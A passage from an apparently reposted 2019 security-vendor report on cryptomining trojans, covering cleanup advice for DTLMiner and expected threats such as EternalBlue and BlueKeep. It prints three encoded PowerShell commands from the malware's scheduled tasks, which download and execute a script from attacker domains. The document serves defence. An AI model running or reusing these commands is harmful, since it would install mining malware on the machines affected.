WannaMiner清理建議

　　3）DTLMiner（永恒之藍下載器木馬）

　　DTLMiner清理建議

　　刪除隨機名計劃任務：“VDoaC”、"hadpeRz\oABwX"、"lKNVFjCJm\oWuUXql"

　　DTLMiner隨機名計劃任務

　　啟動程序分別為：

　　/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBWAEQAbwBhAEMAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AdAByADIAcQAuAGMAbwBtAC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"

　　/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBoAGEAZABwAGUAUgB6AFwAbwBBAEIAdwBYACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAdwBjAG4AYQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBzAF8AMgAwADEAOQAxADIAMgA3ACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMAA5AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="

　　/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEsATgBWAEYAagBDAEoAbQBcAG8AVwB1AFUAWABxAGwAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AYQBtAHgAbgB5AC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"

　　六、挖礦木馬的未來趨勢

　　6.1 “永恒之藍“漏洞

　　自2017年NSA武器泄漏以來，“永恒之藍“漏洞被挖礦木馬廣泛利用。隨著各大安全廠商對該漏洞進行修復和防御，該漏洞的影響正在逐漸減少。但是從數據上看，仍有約30%未安裝“永恒之藍“漏洞補丁，因此預計2020年有可能出現新的利用“永恒之藍“漏洞的挖礦木馬。

　　6.2BlueKeep漏洞

　　2019年5月15日，微軟發布了針對遠程桌面服務（Remote Desktop Services ，以前稱為終端服務）的關鍵遠程執行代碼漏洞CVE-2019-0708的修復程序，該漏洞影響Windows的Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP等多個版本。攻擊者一旦成功觸發該漏洞，便可以在目標系統上執行任意代碼。

　　2019年9月，我們注意到利用CVE-2019-0708漏洞的EXP代碼已被公開發布至metasploit-framework的Pull requests中，經測試可以實現遠程代碼執行；同時在2019年10月挖礦蠕蟲DTLMiner在其攻擊模塊中也已經加入了CVE-2019-0708漏洞檢測代碼，因此我們推測在2020年極有可能出現利用該漏洞的新型挖礦木馬。

　　6.3僵尸網絡

　　MyKings、KingMiner、WannaMiner等挖礦僵尸網絡在前期感染了大量機器，控制系統后通過計劃任務、數據庫存儲過程、WMI等技術進行持久化攻擊，因而可隨時從服務器下載最新版本的惡意代碼，很難被徹底清除。未來安全廠商與這些病毒團伙在的對抗還會持續。

繼續閱讀：

此文由 中國比特幣官網 編輯，未經允許不得轉載?。?a href="http://www.huohuxiazai.com/">首頁 > 比特幣挖礦 » 騰訊安全發布2019年度挖礦木馬報告（全文）